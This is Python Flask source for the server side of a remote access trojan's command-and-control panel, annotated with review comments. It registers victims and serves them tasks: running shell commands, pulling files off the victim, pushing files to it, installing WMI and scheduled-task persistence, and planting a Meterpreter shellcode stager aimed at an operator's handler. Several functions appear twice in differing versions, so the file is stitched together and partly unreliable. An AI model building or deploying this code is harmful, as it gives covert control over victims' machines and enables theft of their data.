def check():
    """Victim registration endpoint.

    URL-decodes the posted body, hashes it together with SECRET_KEY to obtain
    the victim's identifier (``signature``), registers the caller's address
    under that id if it is new (queueing an 'init' task whose pid is the
    signature itself), and returns the rendered bootstrap payload.
    """
    global server
    data = unquote(request.get_data())
    # TODO: add data format check -- the body is hashed as-is; nothing here
    # rejects an empty or attacker-shaped registration body.
    # NOTE(review): MD5(data + secret) is the identity token. It is only as
    # unguessable as SECRET_KEY; treat the secret as a credential.
    signature = md5(data + SECRET_KEY)
    victims = victim.victim()
    loader = payload.payload()
    if not victims.get(signature):
        victims.add(signature, request.remote_addr)
        # First contact: queue the bootstrap task. Its pid equals the
        # signature; the trailing 4 is presumably a priority/kind flag --
        # confirm against action.add.
        action.action().add(signature, signature, 'init', loader.init(), 4)
    return render_template_string(loader.begin(), server=server, signature=signature)
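def rat(signature):
    """Victim-facing C2 endpoint keyed by the victim's 32-hex signature.

    GET  -> record a heartbeat and hand out the next pending task (or the
            idle marker ``'aGJlYXQ='``, base64 of "hbeat") rendered through
            the template engine with ``server``/``signature``/``pid``.
    POST -> store the victim's output for task ``pid`` (base64-encoded).

    Returns the rendered payload, ``''`` after a feedback upload, or the
    literal string ``"error"`` when the signature or pid is not a lowercase
    32-hex digest or the signature is not a registered victim.
    """
    global server
    c = victim.victim()
    a = action.action()
    hex32 = r"^[0-9a-f]{32}$"
    # Both identifiers are used as store lookup keys; reject anything that is
    # not a 32-hex digest before touching the backend.
    if not re.match(hex32, signature):
        return "error"
    if not c.get(signature):
        return 'error'
    if request.method == 'GET':
        c.heartbeat(signature)
        ac = a.gettask(signature)
        if ac:
            exploit = ac['payload']
            pid = ac['pid']
        else:
            # Nothing pending: serve the idle marker as both payload and pid.
            exploit = 'aGJlYXQ='
            pid = 'aGJlYXQ='
        return render_template_string(exploit, server=server, signature=signature, pid=pid)
    # Feedback upload. ``pid`` is optional in the query string; passing a
    # missing value (None) straight into re.match raised TypeError -> 500.
    pid = request.args.get('pid', '')
    if not re.match(hex32, pid):
        return "error"
    # NOTE(review): nothing here ties ``pid`` to ``signature``; a victim that
    # learns another task id can overwrite that task's feedback.
    data = request.get_data().encode('base64')
    a.setfeedback(pid, data)
    return ''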
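def getResult():
    """Operator-side endpoint: return the decoded output a victim posted for a task.

    Reads ``signature`` and ``pid`` from the request values (query string or
    form; a missing key is left to Flask's KeyError handling, as before).
    Responds with the base64-decoded feedback, or ``error`` with HTTP 500 when
    ``pid`` is not a 32-hex task id, the task is unknown, or no feedback has
    arrived yet.
    """
    import re
    signature = request.values["signature"]
    pid = request.values["pid"]
    # Task ids are md5 hex digests everywhere else in this app; refuse
    # anything else before it is used as a store lookup key.
    if not re.match(r"^[0-9a-f]{32}$", pid):
        return make_response("error", 500)
    a = action.action()
    data = a.get(pid)
    feedback = data.get("feedback") if data else None
    if not feedback:
        return make_response("error", 500)
    # NOTE(review): ``signature`` is read but never compared with the task's
    # owner, so any pid can be read regardless of which victim it belongs to.
    return feedback.decode("base64")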
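def setCmd():
    """Operator-side endpoint: queue a shell command for victim ``signature``.

    Form fields: ``signature`` (target victim, 32-hex digest) and ``cmd``.
    Returns the new task id, or the literal ``"error"`` when either field is
    missing/empty or ``signature`` is not a 32-hex digest. (Previously a
    missing field raised AttributeError on ``None.strip()`` -> HTTP 500.)
    """
    import re
    signature = (request.form.get("signature") or "").strip()
    cmd = (request.form.get("cmd") or "").strip()
    if not re.match(r"^[0-9a-f]{32}$", signature) or not cmd:
        return "error"
    a = action.action()
    p = payload.payload()
    # Task id: digest of time, secret, target and command plus a nonce so
    # re-issuing the same command yields a fresh id.
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + cmd + str(random.random()))
    exploit = p.cmd(cmd)
    a.add(pid, signature, "[cmd] " + cmd, exploit)
    return pid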
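def setUpload():
    """Operator-side endpoint: queue an upload task for victim ``signature``.

    Form fields: ``signature`` (32-hex victim id) and ``filePath`` (path on
    the victim handed to ``payload.upload``). Returns the new task id, or the
    literal ``"error"`` when a field is missing/empty or ``signature`` is not
    a 32-hex digest. (Previously a missing field raised AttributeError on
    ``None.strip()`` -> HTTP 500.)
    """
    import re
    signature = (request.form.get("signature") or "").strip()
    filePath = (request.form.get("filePath") or "").strip()
    if not re.match(r"^[0-9a-f]{32}$", signature) or not filePath:
        return "error"
    a = action.action()
    p = payload.payload()
    # Task id: digest of time, secret, target and path plus a nonce.
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + filePath + str(random.random()))
    exploit = p.upload(filePath)
    a.add(pid, signature, "[upload] " + filePath, exploit)
    return pid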
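def getResult():
    """Operator-side endpoint: return a task's decoded feedback.

    ``signature`` and ``pid`` come from the request values; a missing key is
    left to Flask as before. Returns the base64-decoded feedback, or ``error``
    with HTTP 500 when ``pid`` is not a 32-hex task id, the task does not
    exist, or it has no feedback yet.
    """
    import re
    signature = request.values['signature']
    pid = request.values['pid']
    # Validate the lookup key the same way rat() validates ids.
    if not re.match(r'^[0-9a-f]{32}$', pid):
        return make_response('error', 500)
    a = action.action()
    data = a.get(pid)
    if not data or not data.get('feedback'):
        return make_response('error', 500)
    # NOTE(review): the task is not checked to belong to ``signature``; the
    # parameter is accepted but unused.
    return data['feedback'].decode('base64')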
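def setWmiBackdoor():
    """Operator-side endpoint: queue the WMI persistence payload for victim ``signature``.

    Form field: ``signature`` (32-hex victim id). Returns the new task id, or
    the literal ``"error"`` when the field is missing or not a 32-hex digest
    (previously a missing field raised AttributeError on ``None.strip()``).
    """
    import re
    signature = (request.form.get('signature') or '').strip()
    if not re.match(r'^[0-9a-f]{32}$', signature):
        return "error"
    a = action.action()
    p = payload.payload()
    # Task id: digest of time, secret and target plus a nonce.
    pid = md5(
        str(time.time()) + config.SECRET_KEY + signature +
        str(random.random()))
    exploit = p.WmiBackdoor()
    a.add(pid, signature, '[WmiBackdoor] launched', exploit)
    return pid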
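def setExec():
    """Operator-side endpoint: queue a command (via ``payload.run``) for victim ``signature``.

    Form fields: ``signature`` (32-hex victim id) and ``cmd``. Returns the new
    task id, or the literal ``"error"`` when a field is missing/empty or
    ``signature`` is not a 32-hex digest (previously a missing field raised
    AttributeError on ``None.strip()``).
    """
    import re
    signature = (request.form.get('signature') or '').strip()
    cmd = (request.form.get('cmd') or '').strip()
    if not re.match(r'^[0-9a-f]{32}$', signature) or not cmd:
        return "error"
    a = action.action()
    p = payload.payload()
    # Task id: digest of time, secret, target and command plus a nonce.
    pid = md5(
        str(time.time()) + config.SECRET_KEY + signature + cmd +
        str(random.random()))
    exploit = p.run(cmd)
    a.add(pid, signature, '[cmd] ' + cmd, exploit)
    return pid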
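def setWindowsTasks():
    """Operator-side endpoint: queue a scheduled-task persistence payload for victim ``signature``.

    Form fields: ``signature`` (32-hex victim id) and ``time`` (passed
    verbatim to ``payload.WindowsTasks``; its expected format is not visible
    here). Returns the new task id, or the literal ``"error"`` when a field is
    missing/empty or ``signature`` is not a 32-hex digest (previously a
    missing field raised AttributeError on ``None.strip()``).
    """
    import re
    signature = (request.form.get('signature') or '').strip()
    t = (request.form.get('time') or '').strip()
    if not re.match(r'^[0-9a-f]{32}$', signature) or not t:
        return "error"
    a = action.action()
    p = payload.payload()
    # Task id: digest of time, secret, target and schedule plus a nonce.
    pid = md5(
        str(time.time()) + config.SECRET_KEY + signature + t +
        str(random.random()))
    exploit = p.WindowsTasks(t)
    a.add(pid, signature, '[WindowsTasks] ' + t, exploit)
    return pid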
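def setUpload():
    """Operator-side endpoint: queue an upload task for victim ``signature``.

    Form fields: ``signature`` (32-hex victim id) and ``filePath`` (path on
    the victim passed to ``payload.upload``). Returns the new task id, or the
    literal ``"error"`` when a field is missing/empty or ``signature`` is not
    a 32-hex digest (previously a missing field raised AttributeError on
    ``None.strip()``).
    """
    import re
    signature = (request.form.get('signature') or '').strip()
    filePath = (request.form.get('filePath') or '').strip()
    if not re.match(r'^[0-9a-f]{32}$', signature) or not filePath:
        return "error"
    a = action.action()
    p = payload.payload()
    # Task id: digest of time, secret, target and path plus a nonce.
    pid = md5(
        str(time.time()) + config.SECRET_KEY + signature + filePath +
        str(random.random()))
    exploit = p.upload(filePath)
    a.add(pid, signature, '[upload] ' + filePath, exploit)
    return pid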
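def setDownload():
    """Operator-side endpoint: make victim ``signature`` fetch a stored file.

    Form fields: ``signature`` (32-hex victim id), ``filename`` (original
    name of a file in the download store) and ``savePath`` (directory on the
    victim; the original name is appended with a backslash, i.e. a Windows
    path). Returns the new task id, or the literal ``"error"`` when a field
    is missing, ``signature`` is not a 32-hex digest, or no stored file
    matches ``filename`` (previously an unknown name raised TypeError when
    the ``None`` lookup result was indexed).
    """
    import re
    signature = (request.form.get("signature") or "").strip()
    originalname = (request.form.get("filename") or "").strip()
    savePath = (request.form.get("savePath") or "").strip()
    if not re.match(r"^[0-9a-f]{32}$", signature) or not originalname:
        return "error"
    a = action.action()
    p = payload.payload()
    d = download.download()
    # One store lookup instead of two.
    stored = d.getbyname(originalname)
    if not stored:
        return "error"
    filename = stored["filename"]
    originalname = stored["originalname"]
    savePath += "\\" + originalname
    # Task id: digest of time, secret, target, names and path plus a nonce.
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + originalname + savePath + str(random.random()))
    exploit = p.download(filename, savePath)
    a.add(pid, signature, "[download] " + originalname + "(" + filename + ")" + " [savepath] " + savePath, exploit)
    return pid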
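def plantMeterpreter0():
    """Operator-side endpoint: queue a Meterpreter shellcode stager for victim ``signature``.

    Form fields: ``signature`` (32-hex victim id), ``ip`` and ``port`` of the
    handler. LHOST/LPORT are written to the shared settings store before the
    shellcode is generated. Returns the new task id, or the literal
    ``"error"`` when ``signature`` is malformed, ``ip`` is empty, or ``port``
    is not an integer in 1..65535 (previously a missing field raised
    AttributeError on ``None.strip()`` and a bogus port went straight into
    the settings store).
    """
    import re
    signature = (request.form.get('signature') or '').strip()
    ip = (request.form.get('ip') or '').strip()
    port = (request.form.get('port') or '').strip()
    if not re.match(r'^[0-9a-f]{32}$', signature) or not ip:
        return "error"
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        return "error"
    a = action.action()
    p = payload.payload()
    s = settings.settings()
    # NOTE(review): the handler address lives in global settings, so two
    # operators planting stagers concurrently can read each other's
    # LHOST/LPORT between these writes and MeterpreterShellcode().
    s.set('LHOST', ip)
    s.set('LPORT', port)
    # Task id: digest of time, secret and target plus a nonce.
    pid = md5(
        str(time.time()) + config.SECRET_KEY + signature +
        str(random.random()))
    exploit = p.MeterpreterShellcode()
    a.add(pid, signature, '[MeterpreterShellcode] %s:%s' % (ip, port), exploit)
    return pid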
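def setDownload():
    """Operator-side endpoint: make victim ``signature`` fetch a stored file.

    Form fields: ``signature`` (32-hex victim id), ``filename`` (original
    name of a file in the download store) and ``savePath`` (destination on
    the victim, passed verbatim to ``payload.download``). Returns the new
    task id, or the literal ``"error"`` when a field is missing,
    ``signature`` is not a 32-hex digest, or no stored file matches
    ``filename`` (previously an unknown name raised TypeError when the
    ``None`` lookup result was indexed).
    """
    import re
    signature = (request.form.get('signature') or '').strip()
    originalname = (request.form.get('filename') or '').strip()
    savePath = (request.form.get('savePath') or '').strip()
    if not re.match(r'^[0-9a-f]{32}$', signature) or not originalname:
        return "error"
    a = action.action()
    p = payload.payload()
    d = download.download()
    stored = d.getbyname(originalname)
    if not stored:
        return "error"
    filename = stored['filename']
    # Task id: digest of time, secret, target, names and path plus a nonce.
    pid = md5(
        str(time.time()) + config.SECRET_KEY + signature + originalname +
        savePath + str(random.random()))
    exploit = p.download(filename, savePath)
    a.add(
        pid, signature, '[download] ' + originalname + '(' + filename + ')' +
        ' [savepath] ' + savePath, exploit)
    return pid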
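def rat(signature):
    """Victim-facing C2 endpoint keyed by the victim's 32-hex signature.

    GET: record a heartbeat and serve the victim's next unfinished task
    through the template engine. A task whose pid equals the signature
    (presumably the 'init' task queued at registration) is marked done as
    soon as it is handed out; any other task is re-served while its
    ``repeat`` counter is below 3 (``addrepeat`` presumably increments it),
    after which it is no longer delivered. With nothing to serve an empty
    payload with pid 'heartbeat' is rendered.
    POST: store the victim's base64-encoded output for task ``pid``.

    Returns the literal 'error' when the signature or pid is not a lowercase
    32-hex digest or the signature is not a registered victim.
    """
    global server
    c = victim.victim()
    a = action.action()
    hex32 = r"^[0-9a-f]{32}$"
    # Validate once; the GET branch used to repeat this whole check.
    if not re.match(hex32, signature):
        return "error"
    if not c.get(signature):
        return 'error'
    if request.method == 'GET':
        c.heartbeat(signature)
        # TODO: add global (broadcast) tasks
        # Look up the victim's unfinished task.
        ac = a.gettask(signature)
        if ac and signature == ac['pid']:
            a.setfeedback(signature, 'done')
            exploit = ac['payload']
            pid = ac['pid']
        elif ac and ac['repeat'] < 3:
            exploit = ac['payload']
            pid = ac['pid']
            a.addrepeat(pid)
        else:
            exploit = ''
            pid = 'heartbeat'
        return render_template_string(exploit,
                                      server=server,
                                      signature=signature,
                                      pid=pid)
    # Feedback upload. ``pid`` is optional in the query string; a missing
    # value (None) used to reach re.match and raise TypeError -> 500.
    pid = request.args.get('pid', '')
    if not re.match(hex32, pid):
        return "error"
    # NOTE(review): ``pid`` is not checked to belong to ``signature``; any
    # registered victim can write feedback for any task id it knows.
    data = request.get_data().encode('base64')
    a.setfeedback(pid, data)
    return ''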